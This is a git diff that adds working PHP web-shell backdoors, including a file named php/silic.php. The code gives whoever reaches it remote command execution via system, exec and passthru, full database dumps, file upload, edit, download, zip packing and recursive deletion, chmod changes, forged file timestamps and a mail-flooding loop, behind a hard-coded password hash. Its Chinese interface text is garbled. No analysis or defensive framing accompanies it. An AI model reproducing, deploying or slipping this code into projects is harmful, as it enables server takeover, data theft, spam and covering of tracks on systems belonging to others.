></td></tr></table></form></center></table>'.$end;exit;}
+if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
+$date = date("Y-m-d");
+$dbserver = $_POST['server'];
+$dbuser = $_POST['username'];
+$dbpass = $_POST['password'];
+$dbname = $_POST['dbname'];
+$file = "Dump-$dbname-$date";
+$method = $_POST['method'];
+if ($method=='sql'){
+$file="Dump-$dbname-$date.sql";
+$fp=fopen($file,"w");
+}else{
+$file="Dump-$dbname-$date.sql.gz";
+$fp = gzopen($file,"w");
+}
+function write($data) {
+global $fp;
+if ($_POST['method']=='sql'){
+fwrite($fp,$data);
+}else{
+gzwrite($fp, $data);
+}}
+mysql_connect ($dbserver, $dbuser, $dbpass);
+mysql_select_db($dbname);
+$tables = mysql_query ("SHOW TABLES");
+while ($i = mysql_fetch_array($tables)) {
+    $i = $i['Tables_in_'.$dbname];
+    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
+    write($create['Create Table'].";\n\n");
+    $sql = mysql_query ("SELECT * FROM ".$i);
+    if (mysql_num_rows($sql)) {
+        while ($row = mysql_fetch_row($sql)) {
+            foreach ($row as $j => $k) {
+                $row[$j] = "'".mysql_escape_string($k)."'";
+            }
+            write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
+        }
+    }
+}
+if ($method=='sql'){
+fclose ($fp);
+}else{
+gzclose($fp);}
+header("Content-Disposition: attachment; filename=" . $file);   
+header("Content-Type: application/download");
+header("Content-Length: " . filesize($file));
+flush();
+
+$fp = fopen($file, "r");
+while (!feof($fp))
+{
+    echo fread($fp, 65536);
+    flush();
+} 
+fclose($fp); 
+}
+
+if ($_GET['do']=="mail"){
+echo $head.'
+<form method=post action="'.$me.'">
+<p align="center">
+Address : <input type="text" name="admail" size="50"><br><br>Subject : <input type="text" name="submail" size="50"><br><br><textarea cols=70 rows=18 name=textmail>Text</textarea><br><br>Number For Send : <input type="text" name="numail" size="5" value=1><input type=submit value=Send!></form>'.$end;exit;}
+if ($_POST['admail'] && $_POST['submail'] ){
+for($mi=0;$mi<intval($_POST['numail']);$mi++){
+mail($_POST['admail'], $_POST['submail'], $_POST['textmail']);}
+}
+if($_GET['do']=="db"){
+echo $head;sqlclienT();echo $end;
+exit;
+}
+if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){
+$chmodnum2=$_REQUEST['chmodnow'];
+chmod($_REQUEST['file2ch'],"0".$chmodnum2);
+}
+if($_GET['do']=="chmod"){
+echo $head.$formg.$nowaddress."<p align=center><b>Chmod</b><br><input size=50 name=file2ch value='".$_REQUEST['address'].$_REQUEST['filename']."'> To  <input name=chmodnow size=1 value=777><br><input type=submit value=Set></form>".$end;exit;
+
+}
+/* if($_GET['do']=="edit"){
+if($_GET['filename']=="dir"){
+if(is_readable($_GET['address'])){
+chdir($_GET['address']);}else{alert("Permission Denied !");}
+
+}} */
+$araddresss=explode($slash,getcwd());
+$matharrayy=count($araddresss)-1;
+$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
+for($countback=0;$countback<count($addr1backk);$countback++){
+$arraybacke[$countback]=$slash.$addr1backk[$countback];
+$backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
+}
+if ($slash=="\\"){
+$countback=null;
+$backdirwin=null;
+for($countback=1;$countback<count($addr1backk);$countback++){
+$backdirwin=$backdirwin."\\".$addr1backk[$countback];}
+$backdirwin=$addr1backk[0].$backdirwin;
+$backaddresss=$backdirwin;
+}else{
+$countback=null;
+$backdirwin=null;
+for($countback=1;$countback<count($addr1backk);$countback++){
+$backdirwin=$backdirwin."/".$addr1backk[$countback];}
+$backdirwin=$addr1backk[0].$backdirwin;
+$backaddresss=$backdirwin;
+$backaddresss=str_replace("\\","/",$backaddresss);
+}
+function calc_dir_size($path)
+{
+$size = 0;
+if ($handle = opendir($path))
+{
+while (false !== ($entry = readdir($handle)))
+{
+$current_path = $path . '/' . $entry;
+if ($entry != '.' && $entry != '..' && !is_link($current_path))
+{
+if (is_file($current_path))
+$size += filesize($current_path);
+elseif (is_dir($current_path))
+$size = calc_dir_size($current_path);
+}
+}
+}
+closedir($handle);
+return $size;
+} 
+function openf($parsef){
+global $basep,$slash;
+
+if(strlen(strpos(getcwd(),$basep))>=1){
+$rr=str_replace($basep,"",getcwd());
+$rr=str_replace("\\","/",$rr);
+$diropen='<a href="'.$rr."/".$parsef.'">'.$parsef.'</a>';
+}else{
+$diropen='<a href="?do=edit&address='.getcwd().$slash.'&filename='.$parsef.'">'.$parsef.'</a>';
+}
+return $diropen;
+}
+if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
+if($cwd==''){$cwd=getcwd();}$nowaddress='<input type=hidden name=address value="'.$cwd.'">';
+$ad=getcwd();
+$hand=opendir("$ad");
+$coi=0;
+$coi2=0;
+
+while (false !== ($fileee = readdir($hand))) {
+
+
+        if ($fileee != "." && $fileee != "..") {
+		if (filetype($fileee)=="dir"){
+		if ($coi %2){
+$colort='"#e7e3de"';
+}else{
+$colort='"#e4e1de"';
+
+}
+$coi++;
+$fil=$fil.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="1" dir="ltr">
+<tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picdir. '" /> <a href="?address='.$cwd.$slash.$fileee.$slash.'">'.$fileee.'</b></span></td>
+<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=dir&address='.$cwd.$slash.'&dirname='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
+<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
+;}
+else{
+
+		if ($coi2 %2){
+$colort='"#e7e3de"';
+}else{
+$colort='"#e4e1de"';
+}
+
+$coi2++;
+$file=$file.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
+<tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picfile. '" /> '.openf($fileee).'</span></td>
+<td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.sizee(filesize($fileee)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">Edit</a></td><td valign="top" height="19" width="23"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
+<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
+;}
+}
+}
+echo $head.'
+<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
+<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
+</tr></table>'.$fil.$file.'</table>
+<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5">
+<tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'����ִ�� : </font></td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input type=hidden name=address value='.getcwd().'><input name=command value=id size=50><input type=hidden name=do value=cmd size=50> <select name=execmethod>
+  <option value="system">System</option>  <option value="exec">Exec</option>  <option value="passthru">Passthru</option>
+</select> <input type=submit value="Execute"></form></td></tr>
+<tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Dir : </font></td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().$slash.' size=50>
+<input type=submit value=Change></form></td></tr>
+<tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create Dir : </font></td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cdirname value='.getcwd().$slash.' size=50><input type=hidden name=address value='.getcwd().'><input type=submit value="  Create  "></form></td></tr>
+<tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create File : </font></td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cfilename value='.getcwd().$slash.' size=50> <input type=hidden name=address value='.getcwd().'><input type=submit value="  Create  "></form></td></tr>
+<tr></form>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Upload : </font></td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
+<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee > <input type=hidden name=address value='.getcwd().'>
+<input type=submit value=Upload /></form></td></tr>
+<tr>
+<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
+<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Copy File : </font></td>
+<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input size=20 name=copyname><input type=hidden name=address value="'.getcwd().'"> To <input size=40 name=cpyto value="'.getcwd().$slash.'"> <input type=submit value =Copy></form></td></tr>
+'.$end;
+?>
\ No newline at end of file
diff --git a/php/silic.php b/php/silic.php
new file mode 100644
index 0000000..1d5e4d0
--- /dev/null
+++ b/php/silic.php
@@ -0,0 +1,2210 @@
+<?php
+error_reporting(E_ERROR);
+header("content-Type: text/html; charset=gb2312");
+set_time_limit(0);
+function Root_GP(&$array)
+{
+	while(list($key,$var) = each($array))
+	{
+		if((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')
+		{
+			if(is_string($var)) $array[$key] = stripslashes($var);
+			if(is_array($var)) $array[$key] = Root_GP($var);  
+		}
+	}
+	return $array;
+}
+$salt = "silic1234";
+$psw = trim($_POST['silicpass']);
+$password="8f841a9b44b0167db6056389e0106af4";
+$passt = $salt.$psw;
+$passt = md5(md5(md5($passt)));
+$asse='asert';
+function Root_CSS()
+{
+print<<<END
+<style type="text/css">
+*{padding:0; margin:0;}
+body{background:threedface;font-family:"Verdana","Tahoma","����",sans-serif;font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;}
+a{color:#000000;text-decoration:none;}
+a:hover{background:#BBBBBB;}
+table{color:#000000;font-family:"Verdana","Tahoma","����",sans-serif;font-size:13px;border:1px solid #999999;}
+td{background:#F9F6F4;}
+.toptd{background:threedface;width:310px;border-color:#FFFFFF #999999 #999999 #FFFFFF;border-style:solid;border-width:1px;}
+.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}
+.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
+.footer{padding-top:3px;text-align: center;font-size:12px;font-weight: bold;height:22px;width:950px;color:#000000;background: #888888;}
+</style>\n
+END;
+return false;
+}
+//�ļ�����
+class packdir
+{
+	var $out='';
+	var $datasec=array();
+	var $ctrl_dir=array();
+	var $eof_ctrl_dir="\x50\x4b\x05\x06\x00\x00\x00\x00";
+	var $old_offset=0;
+function packdir($array)
+{
+	if(@function_exists('gzcompress'))
+	{
+		for($n = 0;$n < count($array);$n++)
+		{
+			$array[$n] = urldecode($array[$n]);
+			$fp = @fopen($array[$n], 'r');
+			$filecode = @fread($fp, @filesize($array[$n]));
+			@fclose($fp);
+			$this -> filezip($filecode,basename($array[$n]));
+		}
+	@closedir($zhizhen);
+	$this->out = $this->packfile();
+	return true;
+}
+return false;
+}
+function at($atunix = 0)
+{
+	$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
+	if ($unixarr['year'] < 1980)
+	{
+		$unixarr['year']    = 1980;
+		$unixarr['mon']     = 1;
+		$unixarr['mday']    = 1;
+		$unixarr['hours']   = 0;
+		$unixarr['minutes'] = 0;
+		$unixarr['seconds'] = 0;
+	} 
+	return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) | ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
+}
+function filezip($data, $name, $time = 0)
+{
+	$name = str_replace('\\', '/', $name);
+	$dtime = dechex($this->at($time));
+	$hexdtime	= '\x'.$dtime[6].$dtime[7].'\x'.$dtime[4].$dtime[5].'\x'.$dtime[2].$dtime[3].'\x'.$dtime[0].$dtime[1];
+	eval('$hexdtime = "' . $hexdtime . '";');
+	$fr	= "\x50\x4b\x03\x04";
+	$fr	.= "\x14\x00";
+	$fr	.= "\x00\x00";
+	$fr	.= "\x08\x00";
+	$fr	.= $hexdtime;
+	$unc_len = strlen($data);
+	$crc = crc32($data);
+	$zdata = gzcompress($data);
+	$c_len = strlen($zdata);
+	$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+	$fr .= pack('V', $crc);
+	$fr .= pack('V', $c_len);
+	$fr .= pack('V', $unc_len);
+	$fr .= pack('v', strlen($name));
+	$fr .= pack('v', 0);
+	$fr .= $name;
+	$fr .= $zdata;
+	$fr .= pack('V', $crc);
+	$fr .= pack('V', $c_len);
+	$fr .= pack('V', $unc_len);
+	$this -> datasec[] = $fr;
+	$new_offset = strlen(implode('', $this->datasec));
+	$cdrec = "\x50\x4b\x01\x02";
+	$cdrec .= "\x00\x00";
+	$cdrec .= "\x14\x00";
+	$cdrec .= "\x00\x00";
+	$cdrec .= "\x08\x00";
+	$cdrec .= $hexdtime;
+	$cdrec .= pack('V', $crc);
+	$cdrec .= pack('V', $c_len);
+	$cdrec .= pack('V', $unc_len);
+	$cdrec .= pack('v', strlen($name) );
+	$cdrec .= pack('v', 0 );
+	$cdrec .= pack('v', 0 );
+	$cdrec .= pack('v', 0 );
+	$cdrec .= pack('v', 0 );
+	$cdrec .= pack('V', 32 );
+	$cdrec .= pack('V', $this -> old_offset );
+	$this -> old_offset = $new_offset;
+	$cdrec .= $name;
+	$this -> ctrl_dir[] = $cdrec;
+}
+function packfile()
+{
+	$data    = implode('', $this -> datasec);
+	$ctrldir = implode('', $this -> ctrl_dir);
+	return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";
+}
+}
+function File_Str($string)
+{
+	return str_replace('//','/',str_replace('\\','/',$string));
+}
+function File_Size($size)
+{
+	if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . ' G';
+	elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . ' M';
+	elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . ' K';
+	else $size = $size . ' B';
+	return $size;
+}
+function File_Mode()
+{
+	$RealPath = realpath('./');
+	$SelfPath = $_SERVER['PHP_SELF'];
+	$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
+	return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
+}
+function File_Read($filename)
+{
+	$handle = @fopen($filename,"rb");
+	$filecode = @fread($handle,@filesize($filename));
+	@fclose($handle);
+	return $filecode;
+}
+function File_Write($filename,$filecode,$filemode)
+{
+	$key = true;
+	$handle = @fopen($filename,$filemode);
+	if(!@fwrite($handle,$filecode))
+	{
+	@chmod($filename,0666);
+	$key = @fwrite($handle,$filecode) ? true : false;
+	}
+@fclose($handle);
+return $key;
+}
+function File_Up($filea,$fileb)
+{
+	$key = @copy($filea,$fileb) ? true : false;
+	if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;
+	return $key;
+}
+function File_Down($filename)
+{
+	if(!file_exists($filename)) return false;
+	$filedown = basename($filename);
+	$array = explode('.', $filedown);
+	$arrayend = array_pop($array);
+	header('Content-type: application/x-'.$arrayend);
+	header('Content-Disposition: attachment; filename='.$filedown);
+	header('Content-Length: '.filesize($filename));
+	@readfile($filename);
+	exit;
+}
+function File_Deltree($deldir)
+{
+	if(($mydir = @opendir($deldir)) == NULL) return false;	
+	while(false !== ($file = @readdir($mydir)))
+	{
+		$name = File_Str($deldir.'/'.$file);
+		if((is_dir($name)) && ($file!='.') && ($file!='..')){@chmod($name,0777);File_Deltree($name);}
+		if(is_file($name)){@chmod($name,0777);@unlink($name);}
+	} 
+	@closedir($mydir);
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? true : false;
+}
+function File_Act($array,$actall,$inver)
+{
+	if(($count = count($array)) == 0) return '��ѡ���ļ�';
+	if($actall == 'e')
+	{
+		$zip = new packdir;
+		if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;}
+		return '����ļ�ʧ��';
+	}
+	$i = 0;
+	while($i < $count)
+	{
+		$array[$i] = urldecode($array[$i]);
+		switch($actall)
+		{
+			case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '·������'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '���Ƶ�'.$inver.'Ŀ¼'; break;
+			case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = 'ɾ��'; break;
+			case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '����ֵ����'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '�����޸�Ϊ'.$inver; break;
+			case "d" : @touch($array[$i],strtotime($inver)); $msg = '�޸�ʱ��Ϊ'.$inver; break;
+		}
+		$i++;
+	}
+	return '��ѡ�ļ�'.$msg.'���';
+}
+function File_Edit($filepath,$filename,$dim = '')
+{
+	$THIS_DIR = urlencode($filepath);
+	$THIS_FILE = File_Str($filepath.'/'.$filename);
+	if(file_exists($THIS_FILE)){$FILE_TIME = @date('Y-m-d H:i:s',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));}
+	else {$FILE_TIME = @date('Y-m-d H:i:s',time());$FILE_CODE = '';}
+print<<<END
+<script language="javascript">
+var NS4 = (document.layers);
+var IE4 = (document.all);
+var win = this;
+var n = 0;
+function search(str){
+	var txt, i, found;
+	if(str == "")return false;
+	if(NS4){
+		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
+		if(n == 0) alert(str + " ... Not-Find")
+	}
+	if(IE4){
+		txt = win.document.body.createTextRange();
+		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
+			txt.moveStart("character", 1);
+			txt.moveEnd("textedit")
+		}
+		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
+		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
+	}
+	return false
+}
+function CheckDate(){
+	var re = document.getElementById('mtime').value;
+	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
+	var r = re.match(reg);
+	if(r==null){alert('���ڸ�ʽ����ȷ!��ʽ:yyyy-mm-dd hh:mm:ss');return false;}
+	else{document.getElementById('editor').submit();}
+}
+</script>
+<div class="actall">��������: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
+<input type="button" value="����" onclick="search(searchs.value)"></div>
+<form method="POST" id="editor" action="?s=a&p={$THIS_DIR}">
+<div class="actall"><input type="text" name="pfn" value="{$THIS_FILE}" style="width:750px;"></div>
+<div class="actall"><textarea name="pfc" id style="width:750px;height:380px;">{$FILE_CODE}</textarea></div>
+<div class="actall">�ļ��޸�ʱ�� <input type="text" name="mtime" id="mtime" value="{$FILE_TIME}" style="width:150px;"></div>
+<div class="actall"><input type="button" value="����" onclick="CheckDate();" style="width:80px;">
+<input type="button" value="����" onclick="window.location='?s=a&p={$THIS_DIR}';" style="width:80px;"></div>
+</form>
+END;
+}
+function File_Soup($p)
+{
+	$THIS_DIR = urlencode($p);
+	$UP_SIZE = get_cfg_var('upload_max_filesize');
+	$MSG_BOX = '��������������С:'.$UP_SIZE.', ������ʽ(new.php),��Ϊ��,�򱣳�ԭ�ļ���.';
+	if(!empty($_POST['updir']))
+	{
+		if(count($_FILES['soup']) >= 1)
+		{
+			$i = 0;
+			foreach ($_FILES['soup']['error'] as $key => $error)
+			{
+				if ($error == UPLOAD_ERR_OK)
+				{
+					$souptmp = $_FILES['soup']['tmp_name'][$key];
+					if(!empty($_POST['reup'][$i]))$soupname = $_POST['reup'][$i]; else $soupname = $_FILES['soup']['name'][$key];
+					$MSG[$i] = File_Up($souptmp,File_Str($_POST['updir'].'/'.$soupname)) ? $soupname.'�ϴ��ɹ�' : $soupname.'�ϴ�ʧ��';
+				}
+				$i++;
+			}
+		}
+		else
+		{
+			$MSG_BOX = '��ѡ���ļ�';
+		}
+	}
+print<<<END
+<div class="msgbox">{$MSG_BOX}</div>
+<form method="POST" id="editor" action="?s=q&p={$THIS_DIR}" enctype="multipart/form-data">
+<div class="actall">�ϴ���Ŀ¼: <input type="text" name="updir" value="{$p}" style="width:531px;height:22px;"></div>
+<div class="actall">����1 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[0] </div>
+<div class="actall">����2 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[1] </div>
+<div class="actall">����3 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[2] </div>
+<div class="actall">����4 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[3] </div>
+<div class="actall">����5 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[4] </div>
+<div class="actall">����6 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[5] </div>
+<div class="actall">����7 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[6] </div>
+<div class="actall">����8 <input type="file" name="soup[]" style="width:300px;height:22px;"> ���� <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[7] </div>
+<div class="actall"><input type="submit" value="�ϴ�" style="width:80px;"> <input type="button" value="����" onclick="window.location='?s=a&p={$THIS_DIR}';" style="width:80px;"></div>
+</form>
+END;
+}
+function File_a($p)
+{
+	if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
+	$MSG_BOX = '�ȴ���Ϣ����';
+	$UP_DIR = urlencode(File_Str($p.'/..'));
+	$REAL_DIR = File_Str(realpath($p));
+	$FILE_DIR = File_Str(dirname(__FILE__));
+	$ROOT_DIR = File_Mode();
+	$THIS_DIR = urlencode(File_Str($REAL_DIR));
+	$NUM_D = 0;
+	$NUM_F = 0;
+	if(!empty($_POST['pfn'])){$intime = @strtotime($_POST['mtime']);$MSG_BOX = File_Write($_POST['pfn'],$_POST['pfc'],'wb') ? '�༭�ļ� '.$_POST['pfn'].' �ɹ�' : '�༭�ļ� '.$_POST['pfn'].' ʧ��';@touch($_POST['pfn'],$intime);}
+	if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST['ufn']; else $upfilename = $_FILES['ufp']['name'];$MSG_BOX = File_Up($_FILES['ufp']['tmp_name'],File_Str($REAL_DIR.'/'.$upfilename)) ? '�ϴ��ļ� '.$upfilename.' �ɹ�' : '�ϴ��ļ� '.$upfilename.' ʧ��';}
+	if(!empty($_POST['actall'])){$MSG_BOX = File_Act($_POST['files'],$_POST['actall'],$_POST['inver']);}
+	if(isset($_GET['md'])){$modfile = File_Str($REAL_DIR.'/'.$_GET['mk']); if(!eregi("^[0-7]{4}$",$_GET['md'])) $MSG_BOX = '����ֵ����'; else $MSG_BOX = @chmod($modfile,base_convert($_GET['md'],8,10)) ? '�޸� '.$modfile.' ����Ϊ '.$_GET['md'].' �ɹ�' : '�޸� '.$modfile.' ����Ϊ '.$_GET['md'].' ʧ��';}
+	if(isset($_GET['mn'])){$MSG_BOX = @rename(File_Str($REAL_DIR.'/'.$_GET['mn']),File_Str($REAL_DIR.'/'.$_GET['rn'])) ? '���� '.$_GET['mn'].' Ϊ '.$_GET['rn'].' �ɹ�' : '���� '.$_GET['mn'].' Ϊ '.$_GET['rn'].' ʧ��';}
+	if(isset($_GET['dn'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.'/'.$_GET['dn']),0777) ? '����Ŀ¼ '.$_GET['dn'].' �ɹ�' : '����Ŀ¼ '.$_GET['dn'].' ʧ��';}
+	if(isset($_GET['dd'])){$MSG_BOX = File_Deltree($_GET['dd']) ? 'ɾ��Ŀ¼ '.$_GET['dd'].' �ɹ�' : 'ɾ��Ŀ¼ '.$_GET['dd'].' ʧ��';}
+	if(isset($_GET['df'])){if(!File_Down($_GET['df'])) $MSG_BOX = '�����ļ�������';}
+	Root_CSS();
+print<<<END
+<script type="text/javascript">
+	function Inputok(msg,gourl)
+	{
+		smsg = "��ǰ�ļ�:[" + msg + "]";
+		re = prompt(smsg,unescape(msg));
+		if(re)
+		{
+			var url = gourl + escape(re);
+			window.location = url;
+		}
+	}
+	function Delok(msg,gourl)
+	{
+		smsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
+		if(confirm(smsg))
+		{
+			if(gourl == 'b')
+			{
+				document.getElementById('actall').value = escape(gourl);
+				document.getElementById('fileall').submit();
+			}
+			else window.location = gourl;
+		}
+	}
+	function CheckDate(msg,gourl)
+	{
+		smsg = "��ǰ�ļ�ʱ��:[" + msg + "]";
+		re = prompt(smsg,msg);
+		if(re)
+		{
+			var url = gourl + re;
+			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
+			var r = re.match(reg);
+			if(r==null){alert('���ڸ�ʽ����ȷ!��ʽ:yyyy-mm-dd hh:mm:ss');return false;}
+			else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
+		}
+	}
+	function CheckAll(form)
+	{
+		for(var i=0;i<form.elements.length;i++)
+		{
+			var e = form.elements[i];
+			if (e.name != 'chkall')
+			e.checked = form.chkall.checked;
+		}
+	}
+	function SubmitUrl(msg,txt,actid)
+	{
+		re = prompt(msg,unescape(txt));
+		if(re)
+		{
+			document.getElementById('actall').value = actid;
+			document.getElementById('inver').value = escape(re);
+			document.getElementById('fileall').submit();
+		}
+	}
+</script>
+<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
+<div class="actall" style="text-align:center;padding:3px;">
+<form method="GET"><input type="hidden" id="s" name="s" value="a">
+<input type="text" name="p" value="{$REAL_DIR}" style="width:550px;height:22px;">
+<select onchange="location.href='?s=a&p='+options[selectedIndex].value">
+	<option>---����Ŀ¼---</option>
+	<option value="{$ROOT_DIR}">��վ��Ŀ¼</option>
+	<option value="{$FILE_DIR}">������Ŀ¼</option>
+	<option value="C:/">C��</option>
+	<option value="D:/">D��</option>
